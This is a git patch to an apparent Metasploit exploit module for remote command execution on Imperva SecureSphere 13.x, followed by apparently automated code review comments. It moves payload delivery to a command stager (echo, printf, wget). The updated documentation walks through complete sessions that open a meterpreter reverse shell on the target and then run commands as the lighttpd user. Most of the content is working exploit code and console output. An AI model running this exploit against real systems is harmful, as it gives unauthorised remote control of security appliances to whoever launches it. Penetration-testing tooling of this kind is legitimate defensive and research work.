From 24de5d6ee36084686cc04b9012a7c8d148d492d2 Mon Sep 17 00:00:00 2001
From: rsp3ar
Date: Tue, 8 Jan 2019 20:07:35 -0800
Subject: [PATCH] Update to use CmdStager
---
 .../linux/http/imperva_securesphere_exec.md | 148 +++++++++++++++---
 .../linux/http/imperva_securesphere_exec.rb | 26 ++-
 2 files changed, 134 insertions(+), 40 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
index 5272d9e43f..604d84315f 100644
--- a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
+++ b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
@@ -13,7 +13,7 @@ Imperva SecureSphere 13.0/13.1/13.2
 3. `set PASS [Agent registration password]` if the target has been set to gateway mode
 4. Run `check`
 5. Verify that the result is `The target is vulnerable.`
-6. `set payload cmd/unix/reverse_python`
+6. `set payload linux/x64/meterpreter/reverse_tcp`
 7. `set LHOST [IP]`
 8. Run `exploit`
 9. Verify that the reverse shell is obtained
@@ -23,21 +23,66 @@ Imperva SecureSphere 13.0/13.1/13.2 Imperva Secure 13.0 Pre-FTL mode: ``` msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201 -RHOSTS => 192.168.146.201 +msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +RHOST => 192.168.146.201 msf5 exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python -payload => cmd/unix/reverse_python +msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 +msf5 exploit(linux/http/imperva_securesphere_exec) > show options + +Module options (exploit/linux/http/imperva_securesphere_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASS no Agent registration password + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.146.201 yes The target address range or CIDR identifier + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. 
+ SSL true no Use SSL + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI /pws/impcli no The URI path to impcli + TIMEOUT 3 no HTTP connection timeout + URIPATH no The URI to use for this exploit (default is random) + USER imperva no Agent registration username + VHOST no HTTP server virtual host + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.146.215 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Imperva SecureSphere 13.0/13.1/13.2 + + msf5 exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 -[*] Sending payload cmd/unix/reverse_python +[*] Sending payload linux/x64/meterpreter/reverse_tcp +[*] Sending stage (816260 bytes) to 192.168.146.201 +[*] Command Stager progress - 100.00% done (1321/1321 bytes) -uname -a -Linux localhost 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux +meterpreter > sysinfo +Computer : localhost.localdomain +OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > shell +Process 4965 created. +Channel 1 created. id uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd) /sbin/ifconfig 
@@ -45,10 +90,10 @@ eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99 inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:855 errors:0 dropped:0 overruns:0 frame:0 - TX packets:566 errors:0 dropped:0 overruns:0 carrier:0 + RX packets:1331 errors:0 dropped:0 overruns:0 frame:0 + TX packets:825 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 - RX bytes:94180 (91.9 KiB) TX bytes:198152 (193.5 KiB) + RX bytes:1790319 (1.7 MiB) TX bytes:83116 (81.1 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 
@@ -59,28 +104,78 @@ lo Link encap:Local Loopback collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) +exit +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit ``` Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential): ``` msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201 -RHOSTS => 192.168.146.201 +msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +RHOST => 192.168.146.201 msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS PASS => lshy5782%lsLS msf5 exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python -payload => cmd/unix/reverse_python +msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 +msf5 exploit(linux/http/imperva_securesphere_exec) > show options + +Module options (exploit/linux/http/imperva_securesphere_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASS lshy5782%lsLS no Agent registration password + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.146.201 yes The target address range or CIDR identifier + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. 
+ SSL true no Use SSL + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI /pws/impcli no The URI path to impcli + TIMEOUT 3 no HTTP connection timeout + URIPATH no The URI to use for this exploit (default is random) + USER imperva no Agent registration username + VHOST no HTTP server virtual host + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.146.215 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Imperva SecureSphere 13.0/13.1/13.2 + + msf5 exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 -[*] Sending payload cmd/unix/reverse_python +[*] Sending payload linux/x64/meterpreter/reverse_tcp +[*] Sending stage (816260 bytes) to 192.168.146.201 +[*] Command Stager progress - 100.00% done (1321/1321 bytes) -uname -a -Linux GW 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux +meterpreter > sysinfo +Computer : 192.168.146.201 +OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > shell +Process 19634 created. +Channel 1 created. id uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd) /sbin/ifconfig 
@@ -88,18 +183,23 @@ eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99 inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:309 errors:0 dropped:0 overruns:0 frame:0 - TX packets:339 errors:0 dropped:0 overruns:0 carrier:0 + RX packets:651 errors:0 dropped:0 overruns:0 frame:0 + TX packets:451 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 - RX bytes:52168 (50.9 KiB) TX bytes:56159 (54.8 KiB) + RX bytes:894174 (873.2 KiB) TX bytes:37181 (36.3 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 - RX packets:787 errors:0 dropped:0 overruns:0 frame:0 - TX packets:787 errors:0 dropped:0 overruns:0 carrier:0 + RX packets:153 errors:0 dropped:0 overruns:0 frame:0 + TX packets:153 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 - RX bytes:111598 (108.9 KiB) TX bytes:111598 (108.9 KiB) + RX bytes:21579 (21.0 KiB) TX bytes:21579 (21.0 KiB) +exit +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit ``` diff --git a/modules/exploits/linux/http/imperva_securesphere_exec.rb b/modules/exploits/linux/http/imperva_securesphere_exec.rb index a2fe030cc2..ea3e91f388 100644 --- a/modules/exploits/linux/http/imperva_securesphere_exec.rb +++ b/modules/exploits/linux/http/imperva_securesphere_exec.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager def initialize(info = {}) super( 
@@ -33,22 +34,15 @@ class MetasploitModule < Msf::Exploit::Remote [ [ 'EDB', '45542' ] ], - 'Arch' => ARCH_CMD, - 'Payload' => - { - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic python perl ruby openssl netcat' - } - }, - 'Platform' => %w{ linux unix }, - 'Targets' => + 'DisclosureDate' => "Oct 8 2018", + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'Targets' => [ ['Imperva SecureSphere 13.0/13.1/13.2', {}] ], - 'DisclosureDate' => "Oct 8 2018", - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0)) register_options( [ @@ -86,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi(req_params, datastore['TIMEOUT']) end - def execute_command_via_http(cmd) + def execute_command(cmd, opts = {}) data = { 'command' => 'impctl server status', 'parameters' => { @@ -108,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote def check begin - res = execute_command_via_http('id') + res = execute_command('id') rescue => e print_error("#{e}") return CheckCode::Unknown @@ -130,6 +124,6 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Sending payload #{datastore['PAYLOAD']}") - res = execute_command_via_http(payload.encoded) + execute_cmdstager end end
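Review bot: `'CmdStagerFlavor' => %w{ echo printf wget }` lists three flavors, and if I read the mixin correctly the first entry (`echo`) is what `execute_cmdstager` uses unless the operator overrides it, so the `SRVHOST`/`SRVPORT` options the new include brings in only matter when `wget` is selected; a comment on that line, `# first flavor is the default; wget needs SRVHOST/SRVPORT reachable from the target`, would save the next reader a trip into the mixin. The new `'Arch' => [ARCH_X86, ARCH_X64]` admits 32-bit payloads while every run in the documentation exercises only `linux/x64`, so a note that x86 is untested belongs either here or in the module doc. Minor style: `'DisclosureDate' => "Oct 8 2018"` is the only double-quoted value in this hash; `'Oct 8 2018'` would match its neighbours.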
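Review bot: `def execute_command(cmd, opts = {})` accepts `opts` to satisfy the CmdStager callback signature but nothing visible uses it, and the same method is still called directly from `check`, so its dual role deserves a comment above the definition, e.g. `# Runs cmd through the impcli endpoint; also serves as the CmdStager callback (opts is unused)`. Since `check` wraps its call in `begin/rescue` and maps any exception to `CheckCode::Unknown`, the method should keep raising on transport failures rather than returning nil, otherwise `check` would misreport an unreachable host. The method body continues outside the hunk.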
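Review bot: `execute_cmdstager` is invoked with no options, so flavor and chunking come entirely from the module metadata and the mixin's `CMDSTAGER::FLAVOR` override, which is fine but should be stated once for maintainers who later need `linemax:` or `flavor:` here. The retained `print_status("Sending payload #{datastore['PAYLOAD']}")` predates the stager and now overlaps the mixin's own progress output (seen in the documentation as `Command Stager progress`); either drop it or make it carry new information, e.g. `print_status("Sending payload #{datastore['PAYLOAD']} via command stager")`. The `exploit` method begins outside the hunk.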